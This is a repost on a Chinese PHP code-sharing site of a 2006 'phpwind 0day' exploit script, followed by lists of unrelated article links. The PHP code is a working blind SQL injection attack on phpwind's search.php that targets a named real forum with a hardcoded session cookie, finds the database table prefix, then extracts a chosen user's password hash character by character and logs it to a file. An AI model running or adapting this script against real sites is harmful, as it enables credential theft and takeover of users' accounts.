编程 PHP

从网上搜到的phpwind 0day的代码

Posted in PHP onDecember 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: '.$match[1]." ";
else if (strpos($response,'value="登录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value! ");
else {echo "Maybe It is not vul! ";die();}

echo "Try to Get the uid=$uid 's Password:";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error! ";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo " Done!We Post $count times! ";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

从网上搜到的phpwind 0day的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php split汉字

Jun 05 PHP

php生成二维码的几种方式整理及使用实例

Jun 03 PHP

PHP运行SVN命令显示某用户的文件更新记录的代码

Jan 03 PHP

destoon实现商铺管理主页设置增加新菜单的方法

Jun 26 PHP

php修改指定文件后缀的方法

Sep 11 PHP

thinkphp3.2.2前后台公用类架构问题分析

Nov 25 PHP

PHP解压ZIP文件到指定文件夹的方法

Nov 17 PHP

PHP7多线程搭建教程

Apr 21 PHP

Laravel5.* 打印出执行的sql语句的方法

Jul 24 PHP

Laravel 之url参数,获取路由参数的例子

Oct 21 PHP

TP5框架使用QueryList采集框架爬小说操作示例

Mar 26 PHP

JS中彻底删除JSON对象组成的数组中的元素

Sep 22 PHP

ajax缓存问题解决途径

Dec 06 #PHP

数字转英文

Dec 06 #PHP

?生?D片??C字串

Dec 06 #PHP

?算你??的 PHP 程式大小

Dec 06 #PHP

PHP中，文件上传

Dec 06 #PHP

eWebEditor v3.8 商业完整版 (PHP)

Dec 06 #PHP

实现 win2003 下 mysql 数据库每天自动备份

Dec 06 #PHP

You might like

php学习笔记数组的常用函数

2011/06/13 PHP

php数组中删除元素的实现代码

2012/06/22 PHP

非常实用的php弹出错误警告函数扩展性强

2014/01/17 PHP

VB中的RasEnumConnections函数返回632错误解决方法

2014/07/29 PHP

PHP中使用jQuery+Ajax实现分页查询多功能操作(示例讲解)

2017/09/17 PHP

阿里云Win2016安装Apache和PHP环境图文教程

2018/03/11 PHP

javascript HTMLEncode HTMLDecode的完整实例(兼容ie和火狐)

2009/06/02 Javascript

jQuery select控制插件

2009/08/17 Javascript

浅析jQuery的链式调用之each函数

2010/12/03 Javascript

javascript模拟的Ping效果代码（Web Ping）

2011/03/13 Javascript

实现web打印的各种方法介绍及实现代码

2013/01/09 Javascript

Javascript中判断变量是数组还是对象(array还是object)

2013/08/14 Javascript

Javascript中各种trim的实现详细解析

2013/12/10 Javascript

jQuery在iframe中无法弹出对话框的解决方法

2014/01/12 Javascript

jQuery获取当前对象标签名称的方法

2014/02/07 Javascript

jQuery实现的checkbox级联选择下拉菜单效果示例

2016/12/26 Javascript

js实现随机点名小功能

2017/08/17 Javascript

使用vue如何构建一个自动建站项目

2018/02/05 Javascript

layui 动态设置checbox 选中状态的例子

2019/09/02 Javascript

js canvas实现星空连线背景特效

2019/11/01 Javascript

Vue通过Blob对象实现导出Excel功能示例代码

2020/07/31 Javascript

[01:38]DOTA2辉夜杯欢乐的观众现场采访

2015/12/26 DOTA

使用Python实现简单的服务器功能

2017/08/25 Python

Python实现购物系统(示例讲解)

2017/09/13 Python

TensorFlow如何实现反向传播

2018/02/06 Python

Flask入门之上传文件到服务器的方法示例

2018/07/18 Python

python pandas获取csv指定行列的操作方法

2019/07/12 Python

Python 经典算法100及解析(小结)

2019/09/13 Python

django数据模型中null和blank的区别说明

2020/09/02 Python

美国最大的城市服装和运动鞋零售商：Jimmy Jazz

2016/11/19 全球购物

JD Sports瑞典：英国领先的运动时尚商店

2018/01/28 全球购物

Kate Spade澳大利亚官方网站：美国设计师手袋品牌

2019/09/10 全球购物

魅力教师事迹材料

2014/01/10 职场文书

大学生工作求职信

2014/06/23 职场文书

2015年度企业工作总结

2015/05/21 职场文书

Mac环境Nginx配置和访问本地静态资源的实现

2021/03/31 Servers